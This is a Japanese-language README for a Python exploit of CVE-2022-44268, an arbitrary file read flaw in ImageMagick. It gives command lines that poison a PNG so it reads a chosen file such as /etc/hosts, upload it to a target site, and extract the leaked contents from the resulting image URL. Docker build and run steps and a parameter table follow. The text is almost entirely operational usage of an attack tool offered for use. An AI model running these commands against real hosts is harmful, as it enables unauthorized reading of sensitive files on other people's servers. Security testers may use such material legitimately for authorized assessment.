
CVE-2022-44268のPythonベースのエクスプロイト。ImageMagickの任意ファイル読み取り脆弱性です。PNG画像を汚染して、Webアップロードを介して脆弱なホストから機密ファイルを読み取ります。
CVE-2022-44268 ImageMagick 任意ファイル読み取り
画像を細工する ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
細工済みPNG画像をアップロードする。
エクスプロイトが成功したか確認する 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
ビルド
docker build -t cve-2022-44268 .
実行
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| パラメータ | 説明 | タイプ |
|---|---|---|
| --url | アップロードされたPNG画像のURL | 文字列 |
| --image | 入力PNGファイル | ファイル |
| --output | 出力PNGファイル | ファイル |
| --file-to-read | 脆弱なホストから読み取るファイル | 文字列 |